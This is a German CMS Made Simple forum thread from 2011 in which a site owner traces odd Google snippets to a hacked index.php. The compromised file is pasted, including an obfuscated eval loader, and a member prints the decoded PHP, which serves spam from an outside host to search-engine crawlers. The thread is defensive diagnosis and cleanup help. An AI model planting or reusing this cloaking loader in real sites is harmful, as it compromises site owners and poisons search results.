• twitter image
  • facebook image
  • youtube image
  • linkedin image
Language: CMS Made Simple Czech CMS Made Simple France CMS Made Simple Hungary CMS Made Simple Russia CMS Made Simple Netherlands

All times are UTC




Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 31 posts ]  Go to page 1, 2, 3  Next
Author Message
 Post subject: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 7:45 am 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Hallo liebe Gemeinde,

wenn ich bei google meine Seite abrufe.

site:www.meine-domain.de

Zeigt mir Google eingenartigen Inhalt wie bei meiner Seiten Beschreibung z.B.:

"download VTC Linux Professional Institute Level 2 buy You can copyrnrn files from an FTP Site to your computer. buy SU Podium 1.7.2 for Google SketchUp low ...

download IZotope Ozone 3.08 VST RTAS HTDM MAS AU MAC OSX oem I don't know how they manage to collect so much data in only a few seconds. download CloneCD ..."

Woran liegt das?? Ich habe auch andere CMSMS Homepages gefunden da wurden die gleichen Texte angezeigt.


Danke für eure Hilfe


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 10:10 am 
Offline
Power Poster
Power Poster
User avatar

Joined: Tue Aug 12, 2008 9:30 pm
Posts: 2071
Location: Feldkirchen in Kärnten, Austria
Und die betreffende Seite wäre?

Liest sich für mich eher nach spam als beschreibung ;D

_________________
CMSMS Blog - I do this!
Forge profile
Github profile
Twitter
=============================================
Support CMSMS


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 10:32 am 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Wenn nach den Meldungen google findet man den
ersten stellen eine CMS Made Simple Seiten

z.B. http://tinyurl.com/4xjaufn


Der Content selbst wird auf der Internetseite gar nicht
angezeigt aber in der Google Vorschau!


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 10:41 am 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Bei der Seite ist genau so wie bei unserer :

http://tinyurl.com/3gr8onx

Was steht das für ein müll?

Danke für eure Hilfe?


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 11:03 am 
Offline
Power Poster
Power Poster

Joined: Fri Sep 12, 2008 2:34 pm
Posts: 752
Location: Schweiz / Switzerland
Tönt nach einer gehackten Seite.

Es gibt solche Hacks, die nur beim Googlebot entsprechende Links anzeigen. Darum erscheinen auch die Suchresultate entsprechend. Um dem entgegen zu treten.
Einen schlauen Link zur Problematik kann ich dir gerade nicht bieten.

Ein Ansatz um diese These zu prüfen wäre im Firefox einen User-Agent Switcher zu installieren und den User-Agent auf googlebot ändern. (Anleitungen dazu sollest du mit Google finden)

Ich würde wie folgt vorgehen:
- Backup der DB
- Backup der Daten

-> alles löschen

- CMSms neu installieren (mit einer neuen DB)
- Alle Module und Plugins die du verwendet hast installieren

Danach die alte DB zurückspielen. Damit sind zumindest die Dateien sicher.

- nun alle Zugangspasswörter ändern (CMSms Backend, FTP, MySQL, etc)


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 11:25 am 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Danke für deine Antwort.

Ich kann mir nicht vorstellen das die Seite gehackt worden ist.

Es werden auch keine Links angezeigt und wenn man die betroffene Seite aufruft, erkennt man rein gar nichts.

Die Datebank, das CMS, usw, Passwörter sind alle ziemlich sicher, das neueste CMSMS update habe ich auch einspielt.

Wie kann ich das denn die Inhalte wieder entfernen oder besser gesagt wo finde ich diese Inhalte überhaupt?


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 12:04 pm 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Wenn ich mir die Seite mit einen Seo
Tool anschaue, dann kann ich den Content erkennen.

Im Quelltext steht nichts drin.


Wenn ich jetzt ein altes Backup wieder hochlade besteht
die Sicherheitslücke immer noch! Was soll tun : ???


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 12:10 pm 
Offline
Power Poster
Power Poster

Joined: Mon Nov 05, 2007 11:35 am
Posts: 539
Tl123 wrote:
Ich kann mir nicht vorstellen das die Seite gehackt worden ist.
Es werden auch keine Links angezeigt und wenn man die betroffene Seite aufruft, erkennt man rein gar nichts.

Den Vorschlag mit dem Useragentswitcher hättest Du mal befolgen können, dann müsstest Du nicht mutmaßen.

Schau Dir mal die index.php an und vergleiche sie mit dem Original von hier auf Auffälligkeiten.
Möglicherweise steht der Spass auch in Deinem Template oder in einem UDT/Tag, halte ich aber eher für unwahrscheinlich.

Attachment:
hc_066.png
hc_066.png [ 175.41 KiB | Viewed 7286 times ]

_________________
Unablässige Tools für's Webdevelopement/ Fehlerfindung:
CSS Validierungsservice
Bildschirmlineal
Firebug
Tidy
Deutsche CSS-Referenz


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 12:33 pm 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Danke! Ich hab auch den useragent switcher benutzt
Der ganze Mist ist zu sehen. Im Template steht es nicht.

Wo kann es noch sein?


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 12:39 pm 
Offline
Power Poster
Power Poster

Joined: Mon Nov 05, 2007 11:35 am
Posts: 539
Tl123 wrote:
Wo kann es noch sein?

Wie bitte?
Würde es Dir was ausmachen, die Beiträge hier komplett zu lesen?

_________________
Unablässige Tools für's Webdevelopement/ Fehlerfindung:
CSS Validierungsservice
Bildschirmlineal
Firebug
Tidy
Deutsche CSS-Referenz


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 12:43 pm 
Offline
Power Poster
Power Poster

Joined: Fri Sep 12, 2008 2:34 pm
Posts: 752
Location: Schweiz / Switzerland
Befolge meinen Rat und dein Problem dürfte gelöst sein. Wie ich vermutet hatte, ein Googlebot Hack.


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 12:55 pm 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Sorry, ich bin halt etwas in Panik!

Ich hab die index.php ausgetauscht und nun
ist wieder alles ok! ;D

Woran kann das gelegen haben oder besser gesagt wie kann ich mich schützen?


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 1:21 pm 
Offline
Forum Members
Forum Members

Joined: Sun Jan 30, 2011 9:41 am
Posts: 29
Ja ich hab Sie noch!

<?php function search_some_item($what){/* */ return 0 + eval($what);}$ch_code_e = '';foreach(array(2,28,28,22,28,-10,28,2,24,22,28,32,10,20,6,-120,-62,-10,-62,-36,-36,-42,-36,-118,-82,-180,-128,34,-78,30,32,28,32,22,16,22,38,2,28,-120,-128,-10,-34,-62,-36,-28,-62,-36,-18,-122,-56,-32,-32,-40,-10,-30,-34,-62,-36,-10,-70,-58,-62,-44,-32,-122,-14,-118,-82,-180,10,4,-136,-120,30,32,28,30,32,28,-120,-128,34,-112,-122,-2,28,-6,38,16,2,28,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,6,22,22,6,16,2,-4,22,32,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,18,30,20,-4,22,32,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,42,-6,8,22,22,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,30,2,-6,28,-2,8,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,-4,10,20,6,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,10,20,0,2,40,2,28,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,-2,34,10,16,16,-108,-2,22,18,-122,-118,22,28,-136,30,32,28,30,32,28,-120,-128,34,-112,-122,-2,16,34,30,8,-4,22,32,-122,-118,-118,-180,46,2,-2,8,22,-136,6,-62,32,-10,-102,-94,-96,-104,-94,-96,-86,24,-6,6,2,-120,-122,8,32,32,24,-84,-106,-106,30,22,18,18,2,28,-6,20,0,2,20,6,2,16,8,-6,28,32,-108,-2,22,18,-106,6,2,20,-6,16,16,-108,-2,6,10,-122,-118,-82,50,-82,-180,4,34,20,-2,32,10,22,20,-136,6,-62,32,-10,-102,-94,-96,-104,-94,-96,-86,24,-6,6,2,-120,-128,24,-6,28,-6,18,-102,-10,-118,-136,46,-180,-136,-136,-136,-136,10,4,-136,-120,10,20,32,36,-6,16,-120,6,2,32,-10,-2,4,6,-10,36,-6,28,-120,-122,-6,16,16,22,38,-10,34,28,16,-10,4,22,24,2,20,-122,-118,-118,-136,-124,-124,-136,4,34,20,-2,32,10,22,20,-10,2,40,10,30,32,30,-120,-122,4,10,16,2,-10,6,2,32,-10,-2,22,20,32,2,20,32,30,-122,-118,-118,-180,-136,-136,-136,-136,-136,-136,-136,-136,28,2,32,34,28,20,-136,4,10,16,2,-10,6,2,32,-10,-2,22,20,32,2,20,32,30,-120,-128,24,-6,28,-6,18,-102,-10,-118,-82,-180,-136,-136,-136,-136,2,16,30,2,10,4,-136,-120,4,34,20,-2,32,10,22,20,-10,2,40,10,30,32,30,-120,-122,-2,34,28,16,-10,30,2,32,22,24,32,-122,-118,-118,-136,46,-180,-136,-136,-136,-136,-136,-136,-136,-136,-128,-2,8,-136,-78,-136,-2,34,28,16,-10,10,20,10,32,-120,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-2,34,28,16,-10,30,2,32,22,24,32,-120,-128,-2,8,-112,-136,-66,-30,-36,-48,-42,-40,-32,-10,-30,-36,-48,-112,-128,24,-6,28,-6,18,-102,-10,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-2,34,28,16,-10,30,2,32,22,24,32,-120,-128,-2,8,-112,-136,-66,-30,-36,-48,-42,-40,-32,-10,-56,-62,-70,-64,-62,-36,-112,-136,-60,-70,-48,-34,-62,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-2,34,28,16,-10,30,2,32,22,24,32,-120,-128,-2,8,-112,-136,-66,-30,-36,-48,-42,-40,-32,-10,-36,-62,-32,-30,-36,-44,-32,-36,-70,-44,-34,-60,-62,-36,-112,-136,-102,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-2,34,28,16,-10,30,2,32,22,24,32,-120,-128,-2,8,-112,-136,-66,-30,-36,-48,-42,-40,-32,-10,-30,-34,-62,-36,-70,-58,-62,-44,-32,-112,-136,-122,24,8,24,-122,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-2,34,28,16,-10,30,2,32,22,24,32,-120,-128,-2,8,-112,-136,-66,-30,-36,-48,-42,-40,-32,-10,-62,-44,-66,-42,-64,-54,-44,-58,-112,-136,-122,34,32,4,-110,-88,-122,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-128,0,-6,32,-6,-136,-78,-136,-2,34,28,16,-10,2,40,2,-2,-120,-128,-2,8,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,-2,34,28,16,-10,-2,16,22,30,2,-120,-128,-2,8,-118,-82,-180,-136,-136,-136,-136,-136,-136,-136,-136,28,2,32,34,28,20,-136,-128,0,-6,32,-6,-82,-180,-136,-136,-136,-136,50,-180,-136,-136,-136,-136,2,16,30,2,-136,28,2,32,34,28,20,-136,-122,-122,-82,-180,50)as $ch_code)$ch_code_e .= ( chr(($ch_code + 200)/2));search_some_item($ch_code_e); ?><?php
#CMS - CMS Made Simple
#(c)2004 by Ted Kulp (wishy@users.sf.net)
#This project's homepage is: http://cmsmadesimple.sf.net
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
#$Id: index.php 6899 2011-02-20 01:09:08Z calguy1000 $

$orig_memory = (function_exists('memory_get_usage')?memory_get_usage():0);
$dirname = dirname(__FILE__);
require_once($dirname.'/fileloc.php');

/**
* Entry point for all non-admin pages
*
* @package CMS
*/

$starttime = microtime();
clearstatcache();


if (!isset($_SERVER['REQUEST_URI']) && isset($_SERVER['QUERY_STRING']))
{
$_SERVER['REQUEST_URI'] = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}

if (!file_exists(CONFIG_FILE_LOCATION) || filesize(CONFIG_FILE_LOCATION) < 800)
{
// attempt to create the config.php if it doesn't already exist.
@touch(CONFIG_FILE_LOCATION);
}
if (!file_exists(CONFIG_FILE_LOCATION) || filesize(CONFIG_FILE_LOCATION) < 800)
{
require_once($dirname.'/lib/misc.functions.php');
if (FALSE == is_file($dirname.'/install/index.php')) {
die ('There is no config.php file or install/index.php please correct one these errors!');
} else {
redirect('install/');
}
}
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "<__html><head><title>Maintenance</title></head></__body><p>Site down for maintenance.</p><__body></__html>";
exit;
}

if (!is_writable(TMP_TEMPLATES_C_LOCATION) || !is_writable(TMP_CACHE_LOCATION))
{
echo '<__html><title>Error</title></head></__body>';
echo '<p>The following directories must be writable by the web server:<br />';
echo 'tmp/cache<br />';
echo 'tmp/templates_c<br /></p>';
echo '<p>Please correct by executing:<br /><em>chmod 777 tmp/cache<br />chmod 777 tmp/templates_c</em><br />or the equivilent for your platform before continuing.</p>';
echo '<__body></__html>';
exit;
}

require_once($dirname.'/include.php');
// optionally enable output compression (as long as debug mode isn't on)
if( isset($config['output_compression']) && ($config['output_compression']) && $config['debug'] != true )
{
@ob_start('ob_gzhandler');
}
else
{
@ob_start();
}


$params = array_merge($_GET, $_POST);

$smarty = cmsms()->GetSmarty();
$smarty->params = $params;

$page = get_pageid_or_alias_from_url();
$contentops = cmsms()->GetContentOperations();

$contentobj = '';
if( $page == '__CMS_PREVIEW_PAGE__' && isset($_SESSION['cms_preview']) ) // temporary
{
$tpl_name = trim($_SESSION['cms_preview']);
$fname = '';
if (is_writable($config["previews_path"]))
{
$fname = cms_join_path($config["previews_path"] , $tpl_name);
}
else
{
$fname = cms_join_path(TMP_CACHE_LOCATION , $tpl_name);
}
$fname = $tpl_name;
if( !file_exists($fname) )
{
die('error preview temp file not found: '.$fname);
return false;
}

// build pageinfo
$fh = fopen($fname,'r');
$_SESSION['cms_preview_data'] = unserialize(fread($fh,filesize($fname)));
fclose($fh);
unset($_SESSION['cms_preview']);

$contentobj = $contentops->LoadContentFromSerializedData($_SESSION['cms_preview_data']);
$contentobj->setId('__CMS_PREVIEW_PAGE__');
}
else
{
$contentobj = $contentops->LoadContentFromAlias($page,true);
}

if( !is_object($contentobj) )
{
// specified page not found, load the 404 error page.
$contentobj = $contentops->LoadContentFromAlias('error404',true);
if( !is_object($contentobj) )
{
// that wasn't found either... display a hardcoded message.
ErrorHandler404();
return;
}
else
{
header("HTTP/1.0 404 Not Found");
header("Status: 404 Not Found");
}
}

// $page cannot be empty here
if (is_object($contentobj))
{
if( !$contentobj->IsViewable() )
{
$url = $contentobj->GetURL();
if( $url != '' && $url != '#' )
{
redirect($url);
}
}

if( $contentobj->Secure() &&
(! isset($_SERVER['HTTPS']) || empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] == 'off') )
{
// if this page is marked to be secure, make sure we redirect to the secure page.
redirect($contentobj->GetURL());
}

$allow_cache = (int)get_site_preference('allow_browser_cache',0);
$expiry = (int)max(0,get_site_preference('browser_cache_expiry',60));
$expiry *= $allow_cache;
if( $_SERVER['REQUEST_METHOD'] == 'POST' || !$contentobj->Cachable() ||
$page == '__CMS_PREVIEW_PAGE__' || $expiry == 0 )
{
// Here we adjust headers for non cachable pages
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
}
else
{
// as far as we know, the output is cachable at this point...
// so we mark it so that the output can be cached.
header('Expires: '.gmdate("D, d M Y H:i:s",time() + $expiry * 60).' GMT');
$the_date = time();
if( $contentobj->Cachable() )
{
$the_date = $contentobj->GetModifiedDate();
}
header('Last-Modified: ' . gmdate('D, d M Y H:i:s',$the_date) . ' GMT');
}

cmsms()->set_variable('content_obj',$contentobj);
$smarty->assign('content_obj',$contentobj);

if( $contentobj->Secure() &&
(! isset($_SERVER['HTTPS']) || empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] == 'off') )
{
// if this page is marked to be secure, make sure we redirect to the secure page.
redirect($contentobj->GetURL());
}

cmsms()->set_variable('content_obj',$contentobj);
cmsms()->set_variable('content_id',$contentobj->Id());
cmsms()->set_variable('page',$page);
cmsms()->set_variable('page_id',$page);
cmsms()->set_variable('page_name',$contentobj->Alias());
cmsms()->set_variable('position',$contentobj->Hierarchy());
cmsms()->set_variable('friendly_position',$contentops->CreateFriendlyHierarchyPosition($contentobj->Hierarchy()));

$smarty->assign('content_obj',$contentobj);
$smarty->assign('content_id', $contentobj->Id());
$smarty->assign('page', $page);
$smarty->assign('page_id', $page);
$smarty->assign('page_name', $contentobj->Alias());
$smarty->assign('page_alias', $contentobj->Alias());
$smarty->assign('position', $contentobj->Hierarchy());
$smarty->assign('friendly_position', $gCms->variables['friendly_position']);
}
else
// else if (get_site_preference('enablecustom404') == '' || get_site_preference('enablecustom404') == "0")
{
ErrorHandler404();
exit;
}

$html = '';
$showtemplate = true;

if ((isset($_REQUEST['showtemplate']) && $_REQUEST['showtemplate'] == 'false') ||
(isset($smarty->id) && $smarty->id != '' && isset($_REQUEST[$smarty->id.'showtemplate']) && $_REQUEST[$smarty->id.'showtemplate'] == 'false'))
{
$showtemplate = false;
}


if (isset($_GET["print"]))
{
$pageinfo = cmsms()->get_variable('pageinfo');
$html = $smarty->fetch('print:'.$page, '', $pageinfo->template_id) . "\n";
}
else
{
#If this is a case where a module doesn't want a template to be shown, just disable caching
if( !$showtemplate )
{
// snarfed from process_pagedata plugin
$tpl = $contentobj->GetPropertyValue('pagedata','');
if( !empty($tpl) )
{
$smarty->_compile_source('preprocess template', $tpl, $_compiled);
@ob_start();
$smarty->_eval('?>' . $_compiled);
$result = @ob_get_contents();
@ob_end_clean();
}

// now parse the default content block.
$html = $smarty->fetch('template:notemplate') . "\n";
}
else
{
//$smarty->caching = false;
// $smarty->compile_check = true;

// we allow backward compatibility (for a while)
// for people that have hacks for setting page title
// or header variables by capturing a modules output
// to a smarty variable, and then displaying it later.
if( isset($config['process_whole_template']) && $config['process_whole_template'] === false )
{
$top = $smarty->fetch('tpl_top:'.$contentobj->TemplateId());
$body = $smarty->fetch('tpl_body:'.$contentobj->TemplateId());
$head = $smarty->fetch('tpl_head:'.$contentobj->TemplateId());
$html = $top.$head.$body;
}
else
{
$html = $smarty->fetch('template:'.$contentobj->TemplateId());
}
}
}


Events::SendEvent('Core', 'ContentPostRender', array('content' => &$html));

header("Content-Type: " . cmsms()->get_variable('content-type') . "; charset=" . get_encoding());

echo $html;

@ob_flush();

$endtime = microtime();

$db =& cmsms()->GetDb();

$memory = (function_exists('memory_get_usage')?memory_get_usage():0);
$memory = $memory - $orig_memory;
$memory_peak = (function_exists('memory_get_peak_usage')?memory_get_peak_usage():0);
if ( !is_sitedown() && $config["debug"] == true)
{
echo "<p>Generated in ".microtime_diff($starttime,$endtime)." seconds by CMS Made Simple using ".(isset($db->query_count)?$db->query_count:'')." SQL queries and {$memory} bytes of memory (peak memory usage was {$memory_peak})</p>";
}
else if( isset($config['show_performance_info']) && ($showtemplate == true) )
{
echo "<!-- ".microtime_diff($starttime,$endtime)." / ".(isset($db->query_count)?$db->query_count:'')." / {$memory} / {$memory_peak} -->\n";

}

if( is_sitedown() || $config['debug'] == true)
{
$smarty->clear_compiled_tpl();
#$smarty->clear_all_cache();
}

if ( !is_sitedown() && $config["debug"] == true)
{
#$db->LogSQL(false); // turn off logging

# output summary of SQL logging results
#$perf = NewPerfMonitor($db);
#echo $perf->SuspiciousSQL();
#echo $perf->ExpensiveSQL();

#echo $sql_queries;
foreach ($gCms->errors as $error)
{
echo $error;
}
}

if( $page == '__CMS_PREVIEW_PAGE__' && isset($_SESSION['cms_preview']) ) // temporary
{
unset($_SESSION['cms_preview']);
}


# vim:ts=4 sw=4 noet
?>


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 4:33 pm 
Offline
Forum Members
Forum Members
User avatar

Joined: Tue Jun 02, 2009 8:21 pm
Posts: 116
Bereits in der ersten Zeile versteckt sich der Übeltäter, ich werde mir die mal genau ansehen - vermutlich erzeugt die in irgendeiner Weise den Code der dann später auf der Seite landet.

Edit: Folgender PHP-Code versteckt sich dekodiert dahinter:

Code:
error_reporting(E_ERROR);
$u=strtolower($_SERVER['HTTP_USER_AGENT']);
if (strstr($u,'crawler')or strstr($u,'googlebot')or strstr($u,'msnbot')or strstr($u,'yahoo')or strstr($u,'search')or strstr($u,'bing')or strstr($u,'indexer')or strstr($u,'cuill.com')or strstr($u,'clushbot'))
{echo gEt_1540549page('http://sommerandengelhart.com/genall.cgi');};
function gEt_1540549page($param1_) {
    if (intval(get_cfg_var('allow_url_fopen')) && function_exists('file_get_contents'))
        return file_get_contents($param1_);
    elseif (function_exists('curl_setopt')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$param1_);
        curl_setopt($ch, CURLOPT_HEADER, FALSE);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, 'php');
        curl_setopt($ch, CURLOPT_ENCODING, 'utf-8');
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
    else return '';
}


Wie man sieht wird geprüft, welchen User-Agent der Besucher hat und wenn der dem einer Suchmaschine ähnelt wird von der Seite sommerandengelhart.com der Spamtext nachgeladen.

Ansich scheint also die Seite ansich nicht das Ziel zu sein, stattdessen soll dieser schwachsinnige Text bei Google eingeschleust werden.
Nur der Sinn und Zweck davon ist mir nicht ganz klar, vielleicht geht die Komprommitierung ja noch weiter als man es auf den ersten Blick in der index.php sieht? Denn für einen einfachen Test oder etwas in der Art sind zu viele Seite davon betroffen.


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: Hilfe Google indexiert meine Seiten werkwürdig??
PostPosted: Tue Jul 26, 2011 6:20 pm 
Offline
Power Poster
Power Poster

Joined: Mon Nov 05, 2007 11:35 am
Posts: 539
dc2 wrote:
Nur der Sinn und Zweck davon ist mir nicht ganz klar,[...]

Mir sieht das nach ganz "normalem" Linkfarming/ Google-spamming aus.

_________________
Unablässige Tools für's Webdevelopement/ Fehlerfindung:
CSS Validierungsservice
Bildschirmlineal
Firebug
Tidy
Deutsche CSS-Referenz


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
Display posts from previous:  Sort by  
Post new topic This topic is locked, you cannot edit posts or make further replies.  [ 31 posts ]  Go to page 1, 2, 3  Next

All times are UTC


Who is online

Users browsing this forum: No registered users


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
A2 Hosting